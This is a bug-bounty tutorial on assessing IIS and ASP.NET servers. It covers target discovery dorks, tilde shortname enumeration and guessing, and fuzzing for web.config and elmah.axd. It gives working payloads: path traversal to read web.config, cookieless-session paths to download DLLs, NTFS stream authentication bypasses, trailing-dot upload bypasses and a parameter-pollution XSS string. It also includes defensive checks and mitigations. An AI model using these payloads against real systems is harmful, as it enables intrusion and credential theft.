Disclaimer: This article was written for educational and informational purposes only. The techniques described should be used only in authorized contexts, such as bug bounty programs, contractual penetration testing, or controlled lab environments. The author assumes no responsibility for improper or illegal use of the information contained in this article.
That classic IIS error page should never be treated as a dead end. In many cases, it's simply the visible front of a Windows web server that reveals far more than it should when approached with patience and the right methodology.
This article walks through a practical workflow for assessing IIS targets in bug bounty and security testing, focusing on techniques that consistently uncover misconfigurations, information disclosure, and potential attack paths.
Finding IIS Targets
Internet-Wide Search Engines
Before initiating active testing, check what internet-wide search engines already know about the target. Queries in Shodan's filter syntax built around SSL certificates, organization names, and the "IIS" title can surface servers connected to the same company or certificate footprint.
ssl:"target.com" http.title:"IIS"
ssl.cert.subject.CN:"target.com" http.title:"IIS"
org:"target" http.title:"IIS"
The same approach can be extended to FOFA, Censys, Netlas, or Odin, since each platform indexes a different slice of exposed infrastructure.
Google Dorking
Search engines can also expose IIS fingerprints before any active probing begins. Patterns such as aspnet_client, _vti_bin, indexed .aspx pages, or pages containing Microsoft-IIS and X-Powered-By: ASP.NET often point directly to ASP.NET applications running on IIS.
site:target.com intitle:"IIS Windows Server"
site:target.com inurl:aspnet_client
site:target.com ext:aspx | ext:ashx | ext:asmx
site:target.com intext:"Microsoft-IIS" | intext:"X-Powered-By: ASP.NET"
site:target.com inurl:_vti_bin
site:target.com intitle:"Microsoft Internet Information Services"
Nested wildcard searches may also uncover development or staging hosts that normal enumeration misses.
site:*.target.com intitle:"IIS"
site:*.*.target.com intitle:"IIS"
Active Fingerprinting
The fastest confirmation usually comes from HTTP response headers. Open a raw connection over TCP or TLS, send a minimal request (for example HEAD / HTTP/1.0 followed by a blank line), and read the headers that come back.
nc -v target.com 80
openssl s_client -connect target.com:443
Look for:
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
For broader coverage, use httpx or nuclei to identify IIS hosts at scale. With httpx, keep only the URL column so the resulting file can be fed straight to other tools.
httpx -l targets.txt -td | grep IIS | awk '{print $1}' | tee iis-targets.txt
Early Information Disclosure
Some IIS front ends, especially Exchange or OWA deployments, may disclose internal addressing details when they receive an HTTP/1.0 request. In those cases, the Location header may contain a private IP and the response may also expose the X-FEServer value.
curl -v --http1.0 http://example.com
HTTP/1.1 302 Moved Temporarily
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
Those details can reveal internal hostnames or routing information that become useful later in the assessment.
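As an added check (not code from the original article), the following Python routine parses a raw IIS response and flags the three disclosures described above, so a defender can run it against their own front ends; the response text is constructed from the sample shown and is not a live capture.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample modelled on the response shown above (not a real capture).
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Location: https://192.168.5.237/owa/\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "X-FEServer: NHEXCHANGE2016\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> dict:
    """Turn a raw HTTP response into a lower-cased header map (status line dropped)."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def disclosure_findings(raw: str) -> list:
    """Return the information-disclosure findings for one response."""
    h = parse_headers(raw)
    findings = []
    loc = h.get("location")
    if loc:
        host = urlsplit(loc).hostname or ""
        try:
            # RFC 1918 / loopback / link-local addresses should never reach a client.
            if ipaddress.ip_address(host).is_private:
                findings.append(f"private IP in Location: {host}")
        except ValueError:
            pass  # a hostname rather than a literal IP: nothing to flag here
    if "x-feserver" in h:
        findings.append(f"internal server name in X-FEServer: {h['x-feserver']}")
    if h.get("server", "").startswith("Microsoft-IIS/"):
        findings.append(f"version banner: {h['server']}")
    return findings


if __name__ == "__main__":
    for finding in disclosure_findings(SAMPLE_RESPONSE):
        print(finding)
```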
Scanning and Enumeration
Nuclei for Broad Checks
Once IIS hosts are collected, launch tag-based nuclei scans in the background while manual testing continues.
nuclei -l iis-targets.txt \
-tags microsoft,windows,asp,aspx,iis,azure,config,exposure -silent
HTTPAPI 2.0 Responses
A generic HTTPAPI 2.0 404 should not be dismissed as an empty target. It's often a sign that the application expects a different Host header and is bound to a specific virtual host.
Two ways to continue: inspect the SSL certificate for hostnames in the subject or SAN fields, or brute-force the virtual host with a tool such as ffuf.
ffuf -u https://TARGET_IP/ -H "Host: FUZZ.target.com" -w vhosts.txt -fs 0
If the correct hostname is found, the same endpoint may begin serving the real application instead of the generic error page.
IIS Tilde Enumeration
IIS shortname enumeration is one of the most valuable legacy behaviors to test. Because NTFS still generates DOS-style 8.3 short names by default, specially crafted requests may disclose shortened names for files and directories even when directory listing is disabled.
shortscan https://target.com/ -F -p 1
Burp's IIS Tilde Enumeration Scanner is also an effective alternative.
Typical output can include entries such as:
File: WEB~1.CON
File: GLOBAL~1.ASA
File: SITEBA~1.ZIP
Dir: ADMIN~1
Short names like WEB~1.CON strongly suggest web.config, but names such as SITEBA~1.ZIP require additional work to recover the likely full filename. On the defending side, the leak stops once 8.3 name generation is disabled on the volume (fsutil 8dot3name set 1) and the existing short names are stripped from the web root (fsutil 8dot3name strip), after which the scanner has nothing to enumerate.
Resolving Shortnames
LLM-Assisted Guessing
One approach is using an LLM to propose possible filename completions from the visible fragment, while constraining the output to simple alphanumeric guesses.
Return only a list of words, separated by newlines, and nothing else. Ensure that the words contain only alphanumeric characters.
Make a list of guesses, for what the rest of the word could be from this snippet. Ensure that the snippet is a substring of your guess.
Make the list as extensive as possible.
Snippet: {shortname}
GitHub Code Search
GitHub code search can serve as a large real-world filename corpus. By searching for filenames that begin with the first six characters of the shortname and end with the expected extension, it becomes easier to build realistic guesses.
path:/.ds_st
path:/global*.asa
path:/connec*.config
Tools like GSNW and GitHub-IIS-Shortname-Generator can help turn those fragments into focused wordlists.
python gsnw.py "siteba" output.txt
python scanner.py WEBDEV
Example output:
Found matches:
--------------------------------------------------
- WebDev.md
- WebDeveloper.java
- webdev.txt
- webdevicons.lua
--------------------------------------------------
Total unique matches: 86
The tool shortnameguesser is another option for generating targeted guesses from shortname scanner output.
BigQuery on Public GitHub Data
An Assetnote-inspired workflow uses Google BigQuery's public GitHub dataset. With a regular expression that matches the known prefix and extension, the dataset can return filenames that resemble the hidden resource.
SELECT DISTINCT path
FROM `bigquery-public-data.github_repos.files`
WHERE REGEXP_CONTAINS(path, r'(?i)(\/siteba[a-z0-9]+\.zip|^siteba[a-z0-9]+\.zip)')
LIMIT 1000
This reduces blind guessing by replacing it with filenames observed in real repositories, such as sitebackup.zip or sitebase.zip.
Brute-Forcing Remaining Characters
If smarter approaches fail, fall back to brute-force generation with crunch. The idea is to generate suffixes and then fuzz the target with several naming patterns.
crunch 4 6 abcdefghijklmnopqrstuvwxyz -o wordlist.txt
For a shortname like DESKTO~1.ZIP, try plain concatenation, hyphens, underscores, and URL-encoded spaces through ffuf.
ffuf -w wordlist.txt -u https://target.com/desktoFUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktop-FUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktop_FUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktop%20FUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktopFUZZ.zip -mc 200,301,302,403
The %20 variation matters because Windows filenames may contain spaces and IIS can still serve those files without issue.
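As an added example (not part of the original article), the following Python model of how NTFS derives 8.3 short names filters a candidate list from any of the sources above (LLM guesses, GitHub or BigQuery results, crunch suffixes) down to the names that could actually have produced the observed short name; it covers the space case from the previous paragraph and shows that a name already valid as 8.3 (sitebase.zip, for instance) never gets a tilde name at all. The collision digit and the hashed form NTFS switches to after several collisions are simplified.

```python
import re

# Characters legal in a long name but not in an 8.3 name; NTFS swaps them for '_'.
_REPLACED = re.compile(r"[+,;=\[\]]")


def short_name(name: str, n: int = 1) -> str:
    """Return the 8.3 name NTFS would derive for `name` (simplified model).

    A tilde name exists only when the long name is not already a legal 8.3
    name; otherwise the upper-cased long name is returned unchanged.
    `n` is the collision counter; real NTFS moves to a hashed form after a
    few collisions, which this model does not reproduce.
    """
    original = name.upper()
    stripped = original.replace(" ", "")          # spaces are dropped outright
    if "." in stripped:
        head, _, tail = stripped.rpartition(".")  # only the last dot survives
        if not head:                              # ".ds_store" -> DS_STO~1
            head, tail = tail, ""
    else:
        head, tail = stripped, ""
    head = _REPLACED.sub("_", head.replace(".", ""))
    tail = _REPLACED.sub("_", tail)
    rebuilt = head + ("." + tail if tail else "")
    if len(head) <= 8 and len(tail) <= 3 and rebuilt == original:
        return original                           # already valid 8.3: no tilde name
    return f"{head[:6]}~{n}" + ("." + tail[:3] if tail else "")


def matching_candidates(observed: str, candidates) -> list:
    """Keep only candidates whose derived short name equals the scanner output.

    The digit after '~' is ignored: it depends on what else sits in the
    directory, not on the candidate name itself.
    """
    key = re.sub(r"~\d+", "~", observed.upper())
    return [c for c in candidates if re.sub(r"~\d+", "~", short_name(c)) == key]


if __name__ == "__main__":
    # Constructed candidate list standing in for an LLM/GitHub/crunch wordlist.
    guesses = ["sitebackup.zip", "sitebase.zip", "site backup.zip",
               "site-backup.zip", "sitebackups.7z"]
    print(matching_candidates("SITEBA~1.ZIP", guesses))
    # ['sitebackup.zip', 'site backup.zip']
```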
IIS-Specific Fuzzing
Generic wordlists are not enough for IIS testing. Target files and endpoints that are specific to IIS and ASP.NET deployments.
/web.config
/web.config.bak
/web.config.old
/web.config.txt
/global.asax
/trace.axd
/elmah.axd
/connectionstrings.config
/appsettings.json
/appsettings.Development.json
/appsettings.Staging.json
/appsettings.Production.json
/appsettings.Local.json
/secrets.json
/WS_FTP.LOG
/_vti_pvt/service.cnf
Files such as trace.axd and elmah.axd are important because they may expose request logs, headers, cookies, and sometimes credentials when left enabled.
Always fuzz with extensions that are common in the IIS and .NET ecosystem.
.asp,.aspx,.ashx,.asmx,.wsdl,.wadl,.config,.xml,.zip,.txt,.dll,.json
ffuf -u https://target.com/FUZZ -w iis-wordlist.txt \
-e .asp,.aspx,.ashx,.asmx,.config,.json,.xml,.zip,.bak,.txt \
-mc 200,301,302,403 -fs 0
Several wordlist sources are worth using: SecLists IIS.txt, Orwa's iis.txt, Orwa's aspx.txt, wfuzz iis.txt, dirbuster-ng iis.txt, Assetnote wordlists, and OneListForAll.
Remember that IIS resolves paths case-insensitively, so lowercase deduplicated lists are preferred to avoid wasting requests.
High-Value Files and Paths
web.config Exposure
Reading web.config is a major objective because these files may include machine keys used for signing and encrypting ViewState. If those keys are recovered, they can support malicious ViewState payloads and remote code execution through deserialization. Tools like ysoserial.net can generate the payload once you have the keys. From the defending side, a web.config that turns out to be readable means its machineKey values must be treated as compromised and rotated, since the same keys also validate forms-authentication tickets.
Possible path traversal payloads:
GET /download?id=../../web.config
GET /download?id=..%2f..%2fweb.config
DLL Access Through Cookieless Sessions
ASP.NET's legacy cookieless session feature allows embedding session tokens directly in the URL path using (S(X)) syntax. This can be abused to confuse IIS's path resolution and access the bin directory even when it should be blocked.
GET /(S(X))/b/(S(X))in/Newtonsoft.Json.dll
The same pattern can be reused for application-specific DLLs once their names are known.
GET /(S(X))/b/(S(X))in/WebApplication1.dll
GET /(S(X))/b/(S(X))in/App_Code.dll
GET /(S(X))/b/(S(X))in/MyCustomAPI.dll
Downloaded DLLs can then be decompiled with tools such as JetBrains dotPeek or dnSpy to inspect hardcoded credentials, API keys, internal logic, or custom authentication flows.
Reverse Proxy Path Confusion
When IIS is behind a reverse proxy, path normalization differences can sometimes bypass access control. A path like the following may be treated differently by the proxy and by IIS.
/anything/..%2fadmin/
The proxy may forward the request as if it targeted /anything/, while IIS decodes %2f, resolves traversal, and serves /admin/.
NTFS-Based Authentication Bypass
IIS 7.5-era tricks involving NTFS alternate data streams and index allocation can sometimes bypass basic authentication. Paths such as the following may work because the security check and the filesystem do not interpret them the same way.
/admin::$INDEX_ALLOCATION/admin.php
/admin:$i30:$INDEX_ALLOCATION/admin.php
Upload and WAF Bypasses
File Upload Edge Cases
If an upload feature blocks .asp and .aspx, IIS still renders several other extensions as text/html, which can create stored XSS opportunities.
Extensions that render as HTML:
.cer
.hxt
.htm
XML-related extensions that may support XML-based XSS vectors:
.dtd, .mno, .vml, .xsl, .xht, .svg, .xml, .xsd,
.xsf, .svgz, .xslt, .wsdl, .xhtml
IIS also has a quirk with trailing dots in filenames. If shell.aspx is filtered, variants with one or more trailing dots may still be accepted and then served normally.
shell.aspx.
shell.aspx..
shell.aspx...
Server-side include extensions worth testing:
.stm, .shtm, .shtml
HTTP Parameter Pollution
As a final bypass technique, HTTP Parameter Pollution can sometimes work against WAFs. By splitting a payload across duplicated parameters, the WAF and the backend may parse the request differently.
https://target.com/page?param=<svg/&param=onload=alert(1)>
ASP.NET's Request.QueryString joins duplicate parameter values with a comma by default, which may reconstruct the payload after the WAF check.
Final Thoughts
The attack surface of IIS in bug bounty is wide but consistently under-tested. Everyone's off chasing the latest JavaScript framework vulnerability while these Windows boxes sit there, leaking internal IPs, serving up their own config files, and running with shortname enumeration wide open.
Don't skip the blue screen. Recon harder.
© 2026 Marco Altomare – All rights reserved.
The contents of this article, including text, code, and the techniques described, are protected by copyright. Reproduction, distribution, or modification without the author's written permission is prohibited. For collaborations, quotations, or commercial uses, please contact the author directly.
The techniques described are provided solely for educational and security research purposes. The author assumes no responsibility for improper or illegal use of the information contained therein. Use these techniques only in authorized environments and in compliance with applicable regulations.